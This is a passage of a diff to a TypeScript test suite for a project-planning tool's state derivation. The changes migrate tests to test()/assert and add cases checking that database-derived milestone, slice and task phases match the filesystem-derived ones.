+      assert.ok(state.activeMilestone !== null, 'empty-db: activeMilestone is not null');
 
       closeDatabase();
     } finally {
       closeDatabase();
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 4: Partial DB content fills gaps from disk ──────────────────
-  console.log('\n=== derive-state-db: partial DB fills gaps from disk ===');
-  {
+  test('derive-state-db: partial DB fills gaps from disk', async () => {
     const base = createFixtureBase();
     try {
       // Write all files to disk
@@ -225,8 +239,12 @@ async function main(): Promise<void> {
       writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
       writeFile(base, 'REQUIREMENTS.md', REQUIREMENTS_CONTENT);
 
-      // Open DB but only insert the roadmap — plan and requirements missing from DB
+      // Open DB — insert milestone hierarchy + partial artifacts (#2631 fix)
       openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First Slice', status: 'active', risk: 'low', depends: [] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First Task', status: 'pending' });
+      // Only insert the roadmap artifact — plan and requirements missing from DB
       insertArtifactRow('milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT, {
         artifact_type: 'roadmap',
         milestone_id: 'M001',
@@ -236,25 +254,24 @@ async function main(): Promise<void> {
       const state = await deriveState(base);
 
       // Should work: roadmap from DB, plan from disk fallback
-      assertEq(state.phase, 'executing', 'partial-db: phase is executing');
-      assertEq(state.activeMilestone?.id, 'M001', 'partial-db: activeMilestone is M001');
-      assertEq(state.activeSlice?.id, 'S01', 'partial-db: activeSlice is S01');
-      assertEq(state.activeTask?.id, 'T01', 'partial-db: activeTask is T01');
+      assert.deepStrictEqual(state.phase, 'executing', 'partial-db: phase is executing');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'partial-db: activeMilestone is M001');
+      assert.deepStrictEqual(state.activeSlice?.id, 'S01', 'partial-db: activeSlice is S01');
+      assert.deepStrictEqual(state.activeTask?.id, 'T01', 'partial-db: activeTask is T01');
       // Requirements loaded from disk fallback
-      assertEq(state.requirements?.active, 2, 'partial-db: requirements.active from disk');
-      assertEq(state.requirements?.validated, 1, 'partial-db: requirements.validated from disk');
-      assertEq(state.requirements?.total, 3, 'partial-db: requirements.total from disk');
+      assert.deepStrictEqual(state.requirements?.active, 2, 'partial-db: requirements.active from disk');
+      assert.deepStrictEqual(state.requirements?.validated, 1, 'partial-db: requirements.validated from disk');
+      assert.deepStrictEqual(state.requirements?.total, 3, 'partial-db: requirements.total from disk');
 
       closeDatabase();
     } finally {
       closeDatabase();
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 5: Requirements counting from disk (DB no longer used for content) ─
-  console.log('\n=== derive-state-db: requirements from disk content ===');
-  {
+  test('derive-state-db: requirements from disk content', async () => {
     const base = createFixtureBase();
     try {
       // Write minimal milestone dir (needed for milestone discovery)
@@ -266,17 +283,16 @@ async function main(): Promise<void> {
       const state = await deriveState(base);
 
       // Requirements should come from disk
-      assertEq(state.requirements?.active, 2, 'req-from-disk: requirements.active = 2');
-      assertEq(state.requirements?.validated, 1, 'req-from-disk: requirements.validated = 1');
-      assertEq(state.requirements?.total, 3, 'req-from-disk: requirements.total = 3');
+      assert.deepStrictEqual(state.requirements?.active, 2, 'req-from-disk: requirements.active = 2');
+      assert.deepStrictEqual(state.requirements?.validated, 1, 'req-from-disk: requirements.validated = 1');
+      assert.deepStrictEqual(state.requirements?.total, 3, 'req-from-disk: requirements.total = 3');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 6: DB content with multi-milestone registry ─────────────────
-  console.log('\n=== derive-state-db: multi-milestone from DB ===');
-  {
+  test('derive-state-db: multi-milestone from DB', async () => {
     const base = createFixtureBase();
 
     const completedRoadmap = `# M001: First Milestone
@@ -313,6 +329,13 @@ async function main(): Promise<void> {
 
       // Put roadmap content in DB only
       openDatabase(':memory:');
+      // Insert milestone rows so deriveState takes the DB path (#2631 fix:
+      // empty milestones table now triggers disk→DB sync, which would create
+      // rows without slices — insert explicitly to get the full DB path).
+      insertMilestone({ id: 'M001', title: 'First Milestone', status: 'complete' });
+      insertMilestone({ id: 'M002', title: 'Second Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Done', status: 'complete', risk: 'low', depends: [] });
+      insertSlice({ id: 'S01', milestoneId: 'M002', title: 'In Progress', status: 'active', risk: 'low', depends: [] });
       insertArtifactRow('milestones/M001/M001-ROADMAP.md', completedRoadmap, {
         artifact_type: 'roadmap',
         milestone_id: 'M001',
@@ -329,24 +352,23 @@ async function main(): Promise<void> {
       invalidateStateCache();
       const state = await deriveState(base);
 
-      assertEq(state.registry.length, 2, 'multi-ms-db: registry has 2 entries');
-      assertEq(state.registry[0]?.id, 'M001', 'multi-ms-db: registry[0] is M001');
-      assertEq(state.registry[0]?.status, 'complete', 'multi-ms-db: M001 is complete');
-      assertEq(state.registry[1]?.id, 'M002', 'multi-ms-db: registry[1] is M002');
-      assertEq(state.registry[1]?.status, 'active', 'multi-ms-db: M002 is active');
-      assertEq(state.activeMilestone?.id, 'M002', 'multi-ms-db: activeMilestone is M002');
-      assertEq(state.phase, 'planning', 'multi-ms-db: phase is planning (no plan for S01)');
+      assert.deepStrictEqual(state.registry.length, 2, 'multi-ms-db: registry has 2 entries');
+      assert.deepStrictEqual(state.registry[0]?.id, 'M001', 'multi-ms-db: registry[0] is M001');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'multi-ms-db: M001 is complete');
+      assert.deepStrictEqual(state.registry[1]?.id, 'M002', 'multi-ms-db: registry[1] is M002');
+      assert.deepStrictEqual(state.registry[1]?.status, 'active', 'multi-ms-db: M002 is active');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'multi-ms-db: activeMilestone is M002');
+      assert.deepStrictEqual(state.phase, 'planning', 'multi-ms-db: phase is planning (no plan for S01)');
 
       closeDatabase();
     } finally {
       closeDatabase();
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 7: Cache invalidation works for DB path ─────────────────────
-  console.log('\n=== derive-state-db: cache invalidation ===');
-  {
+  test('derive-state-db: cache invalidation', async () => {
     const base = createFixtureBase();
     try {
       writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
@@ -355,6 +377,10 @@ async function main(): Promise<void> {
       writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
 
       openDatabase(':memory:');
+      // Insert milestone/slice/task rows so deriveState takes the DB path (#2631 fix)
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First Slice', status: 'active', risk: 'low', depends: [] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First Task', status: 'pending' });
       insertArtifactRow('milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT, {
         artifact_type: 'roadmap',
         milestone_id: 'M001',
@@ -367,7 +393,7 @@ async function main(): Promise<void> {
 
       invalidateStateCache();
       const state1 = await deriveState(base);
-      assertEq(state1.activeTask?.id, 'T01', 'cache-inv: first call gets T01');
+      assert.deepStrictEqual(state1.activeTask?.id, 'T01', 'cache-inv: first call gets T01');
 
       // Simulate task completion by updating the plan in DB
       const updatedPlan = PLAN_CONTENT.replace('- [ ] **T01:', '- [x] **T01:');
@@ -378,28 +404,725 @@ async function main(): Promise<void> {
       });
       // Also update file on disk (cachedLoadFile may read from disk for some paths)
       writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', updatedPlan);
+      // Update task status in DB so DB-path also sees completion (#2631 fix)
+      updateTaskStatus('M001', 'S01', 'T01', 'complete');
 
       // Without invalidation, should return cached result (T01 still active)
       const state2 = await deriveState(base);
-      assertEq(state2.activeTask?.id, 'T01', 'cache-inv: cached result still has T01');
+      assert.deepStrictEqual(state2.activeTask?.id, 'T01', 'cache-inv: cached result still has T01');
 
       // After invalidation, should pick up updated content
       invalidateStateCache();
       const state3 = await deriveState(base);
-      assertEq(state3.phase, 'summarizing', 'cache-inv: after invalidation, phase is summarizing (all tasks done)');
-      assertEq(state3.activeTask, null, 'cache-inv: activeTask is null after all done');
+      assert.deepStrictEqual(state3.phase, 'summarizing', 'cache-inv: after invalidation, phase is summarizing (all tasks done)');
+      assert.deepStrictEqual(state3.activeTask, null, 'cache-inv: activeTask is null after all done');
 
       closeDatabase();
     } finally {
       closeDatabase();
       cleanup(base);
     }
-  }
+  });
 
-  report();
-}
+  // ═════════════════════════════════════════════════════════════════════════
+  // New: deriveStateFromDb() cross-validation tests
+  // ═════════════════════════════════════════════════════════════════════════
 
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+  // ─── Test 8: Pre-planning — milestone exists, no roadmap, no slices ───
+  test('derive-state-db: pre-planning via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      // Create milestone dir on disk with a CONTEXT file (not a ghost)
+      writeFile(base, 'milestones/M001/M001-CONTEXT.md', '# M001: First\n\nSome context.');
+
+      // Filesystem-only state
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      // Now open DB, populate hierarchy
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'First', status: 'active' });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'pre-plan-db: phase matches');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, fileState.activeMilestone?.id, 'pre-plan-db: activeMilestone.id matches');
+      assert.deepStrictEqual(dbState.activeSlice, fileState.activeSlice, 'pre-plan-db: activeSlice matches');
+      assert.deepStrictEqual(dbState.activeTask, fileState.activeTask, 'pre-plan-db: activeTask matches');
+      assert.deepStrictEqual(dbState.registry.length, fileState.registry.length, 'pre-plan-db: registry length matches');
+      assert.deepStrictEqual(dbState.registry[0]?.status, fileState.registry[0]?.status, 'pre-plan-db: registry[0] status matches');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 9: Executing — active task with partial completion ──────────
+  test('derive-state-db: executing via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      // Build filesystem fixture
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      // Build matching DB state
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First Slice', status: 'active', risk: 'low', depends: [] });
+      insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second Slice', status: 'pending', risk: 'low', depends: ['S01'] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First Task', status: 'pending' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete' });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, 'executing', 'exec-db: phase is executing');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, 'M001', 'exec-db: activeMilestone is M001');
+      assert.deepStrictEqual(dbState.activeSlice?.id, 'S01', 'exec-db: activeSlice is S01');
+      assert.deepStrictEqual(dbState.activeTask?.id, 'T01', 'exec-db: activeTask is T01');
+      assert.deepStrictEqual(dbState.progress?.tasks?.done, 1, 'exec-db: tasks.done = 1');
+      assert.deepStrictEqual(dbState.progress?.tasks?.total, 2, 'exec-db: tasks.total = 2');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'exec-db: phase matches filesystem');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 10: Summarizing — all tasks complete, no slice summary ──────
+  test('derive-state-db: summarizing via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      const allDonePlan = `# S01: First Slice
+
+**Goal:** Test summarizing.
+**Demo:** Tests pass.
+
+## Tasks
+
+- [x] **T01: First Task** \`est:10m\`
+  First task description.
+
+- [x] **T02: Done Task** \`est:10m\`
+  Already done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', allDonePlan);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First Slice', status: 'active', risk: 'low', depends: [] });
+      insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second Slice', status: 'pending', risk: 'low', depends: ['S01'] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First Task', status: 'complete' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete' });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, 'summarizing', 'summarize-db: phase is summarizing');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'summarize-db: phase matches filesystem');
+      assert.deepStrictEqual(dbState.activeSlice?.id, 'S01', 'summarize-db: activeSlice is S01');
+      assert.deepStrictEqual(dbState.activeTask, null, 'summarize-db: activeTask is null');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 11: Complete — all milestones complete ──────────────────────
+  test('derive-state-db: all complete via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      const completedRoadmap = `# M001: Done Milestone
+
+**Vision:** Already done.
+
+## Slices
+
+- [x] **S01: Done** \`risk:low\` \`depends:[]\`
+  > After this: Done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', completedRoadmap);
+      writeFile(base, 'milestones/M001/M001-VALIDATION.md', '---\nverdict: pass\nremediation_round: 0\n---\n\n# Validation\nPassed.');
+      writeFile(base, 'milestones/M001/M001-SUMMARY.md', '# M001 Summary\n\nDone.');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Done Milestone', status: 'complete' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Done', status: 'complete', risk: 'low', depends: [] });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, 'complete', 'complete-db: phase is complete');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'complete-db: phase matches filesystem');
+      assert.deepStrictEqual(dbState.registry.length, 1, 'complete-db: registry has 1 entry');
+      assert.deepStrictEqual(dbState.registry[0]?.status, 'complete', 'complete-db: M001 is complete');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 12: Blocked — slice deps unmet ──────────────────────────────
+  test('derive-state-db: blocked slice via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      // Roadmap with S02 depending on S01, but S01 not done
+      const blockedRoadmap = `# M001: Blocked Test
+
+**Vision:** Test blocked state.
+
+## Slices
+
+- [ ] **S01: First** \`risk:low\` \`depends:[S02]\`
+  > After this: First done.
+
+- [ ] **S02: Second** \`risk:low\` \`depends:[S01]\`
+  > After this: Second done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', blockedRoadmap);
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Blocked Test', status: 'active' });
+      // Circular deps — both depend on each other, neither done
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First', status: 'pending', risk: 'low', depends: ['S02'] });
+      insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second', status: 'pending', risk: 'low', depends: ['S01'] });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, 'blocked', 'blocked-db: phase is blocked');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'blocked-db: phase matches filesystem');
+      assert.ok(dbState.blockers.length > 0, 'blocked-db: has blockers');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 13: Parked milestone ────────────────────────────────────────
+  test('derive-state-db: parked milestone via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/M001-PARKED.md', 'Parked for now.');
+      writeFile(base, 'milestones/M002/M002-CONTEXT.md', '# M002: Active After Park\n\nReady.');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'parked' });
+      insertMilestone({ id: 'M002', title: 'Active After Park', status: 'active' });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'parked-db: phase matches filesystem');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, 'M002', 'parked-db: activeMilestone is M002');
+      assert.ok(dbState.registry.some(e => e.id === 'M001' && e.status === 'parked'), 'parked-db: M001 is parked in registry');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 14: Validating-milestone — all slices done, no terminal validation ─
+  test('derive-state-db: validating-milestone via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      const doneRoadmap = `# M001: Validate Test
+
+**Vision:** Test validation.
+
+## Slices
+
+- [x] **S01: Done Slice** \`risk:low\` \`depends:[]\`
+  > After this: Done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', doneRoadmap);
+      // No VALIDATION file → validating-milestone phase
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Validate Test', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Done Slice', status: 'complete', risk: 'low', depends: [] });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, 'validating-milestone', 'validate-db: phase is validating-milestone');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'validate-db: phase matches filesystem');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, 'M001', 'validate-db: activeMilestone is M001');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 15: Completing-milestone — terminal validation, no summary ──
+  test('derive-state-db: completing-milestone via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      const doneRoadmap = `# M001: Complete Test
+
+**Vision:** Test completion.
+
+## Slices
+
+- [x] **S01: Done Slice** \`risk:low\` \`depends:[]\`
+  > After this: Done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', doneRoadmap);
+      writeFile(base, 'milestones/M001/M001-VALIDATION.md', '---\nverdict: pass\nremediation_round: 0\n---\n\n# Validation\nPassed.');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Complete Test', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Done Slice', status: 'complete', risk: 'low', depends: [] });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, 'completing-milestone', 'completing-db: phase is completing-milestone');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'completing-db: phase matches filesystem');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 16: Replanning-slice — REPLAN-TRIGGER file exists ───────────
+  test('derive-state-db: replanning-slice via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
+      writeFile(base, 'milestones/M001/slices/S01/S01-REPLAN-TRIGGER.md', 'Replan triggered.');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First Slice', status: 'active', risk: 'low', depends: [] });
+      insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second Slice', status: 'pending', risk: 'low', depends: ['S01'] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First Task', status: 'pending' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete' });
+
+      // Seed the replan_triggered_at column — DB path uses column instead of disk file
+      const { _getAdapter } = await import('../gsd-db.ts');
+      const adapter = _getAdapter();
+      adapter!.prepare(
+        "UPDATE slices SET replan_triggered_at = :ts WHERE milestone_id = :mid AND id = :sid",
+      ).run({ ":ts": new Date().toISOString(), ":mid": "M001", ":sid": "S01" });
+
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, 'replanning-slice', 'replan-db: phase is replanning-slice');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'replan-db: phase matches filesystem');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 17: Performance — deriveStateFromDb < 1ms on populated DB ───
+  test('derive-state-db: performance assertion', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First Slice', status: 'active', risk: 'low', depends: [] });
+      insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second Slice', status: 'pending', risk: 'low', depends: ['S01'] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First Task', status: 'pending' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete' });
+
+      // Warm up (first call may incur filesystem IO for flag file checks)
+      invalidateStateCache();
+      await deriveStateFromDb(base);
+
+      // Timed run
+      const start = performance.now();
+      invalidateStateCache();
+      await deriveStateFromDb(base);
+      const elapsed = performance.now() - start;
+
+      console.log(`  deriveStateFromDb() took ${elapsed.toFixed(3)}ms`);
+      // Use 25ms threshold — catches real regressions without flaking on
+      // slower CI runners (Windows agents measured at ~12ms under load;
+      // the 10ms threshold was too tight for those environments).
+      assert.ok(elapsed < 25, `perf-db: deriveStateFromDb() <25ms (got ${elapsed.toFixed(3)}ms)`);
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 18: Multi-milestone with deps — M001 complete, M002 depends on M001, M003 depends on M002 ─
+  test('derive-state-db: multi-milestone deps via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      const m1Roadmap = `# M001: First
+
+**Vision:** First.
+
+## Slices
+
+- [x] **S01: Done** \`risk:low\` \`depends:[]\`
+  > After this: Done.
+`;
+      const m2Roadmap = `# M002: Second
+
+**Vision:** Second.
+
+## Slices
+
+- [ ] **S01: Active** \`risk:low\` \`depends:[]\`
+  > After this: Done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', m1Roadmap);
+      writeFile(base, 'milestones/M001/M001-VALIDATION.md', '---\nverdict: pass\nremediation_round: 0\n---\n\nPassed.');
+      writeFile(base, 'milestones/M001/M001-SUMMARY.md', '# M001 Summary\n\nDone.');
+      writeFile(base, 'milestones/M002/M002-ROADMAP.md', m2Roadmap);
+      writeFile(base, 'milestones/M002/M002-CONTEXT.md', '---\ndepends_on:\n  - M001\n---\n\n# M002: Second\n\nDepends on M001.');
+      writeFile(base, 'milestones/M003/M003-CONTEXT.md', '---\ndepends_on:\n  - M002\n---\n\n# M003: Third\n\nDepends on M002.');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'First', status: 'complete', depends_on: [] });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Done', status: 'complete', risk: 'low', depends: [] });
+      insertMilestone({ id: 'M002', title: 'Second', status: 'active', depends_on: ['M001'] });
+      insertSlice({ id: 'S01', milestoneId: 'M002', title: 'Active', status: 'pending', risk: 'low', depends: [] });
+      insertMilestone({ id: 'M003', title: 'Third', status: 'active', depends_on: ['M002'] });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.registry.length, fileState.registry.length, 'multi-deps-db: registry length matches');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, 'M002', 'multi-deps-db: activeMilestone is M002 (M001 complete, M003 dep unmet)');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, fileState.activeMilestone?.id, 'multi-deps-db: activeMilestone matches filesystem');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'multi-deps-db: phase matches filesystem');
+
+      // Check registry statuses
+      const m1reg = dbState.registry.find(e => e.id === 'M001');
+      const m2reg = dbState.registry.find(e => e.id === 'M002');
+      const m3reg = dbState.registry.find(e => e.id === 'M003');
+      assert.deepStrictEqual(m1reg?.status, 'complete', 'multi-deps-db: M001 is complete');
+      assert.deepStrictEqual(m2reg?.status, 'active', 'multi-deps-db: M002 is active');
+      assert.deepStrictEqual(m3reg?.status, 'pending', 'multi-deps-db: M003 is pending (dep M002 unmet)');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 19: K002 — both 'complete' and 'done' treated as done ───────
+  test('derive-state-db: K002 status handling', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First Slice', status: 'active', risk: 'low', depends: [] });
+      insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second Slice', status: 'pending', risk: 'low', depends: ['S01'] });
+      // Use 'done' status (the alternative from K002)
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First Task', status: 'pending' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'done' });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, 'executing', 'k002-db: phase is executing');
+      assert.deepStrictEqual(dbState.activeTask?.id, 'T01', 'k002-db: activeTask is T01 (T02 done)');
+      assert.deepStrictEqual(dbState.progress?.tasks?.done, 1, 'k002-db: tasks.done counts done status');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 20: Dual-path wiring — deriveState() uses DB when populated ─
+  test('derive-state-db: dual-path wiring', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First Slice', status: 'active', risk: 'low', depends: [] });
+      insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second Slice', status: 'pending', risk: 'low', depends: ['S01'] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First Task', status: 'pending' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete' });
+
+      // deriveState() should automatically use DB path since milestones table is populated
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.deepStrictEqual(state.phase, 'executing', 'dual-path: phase is executing');
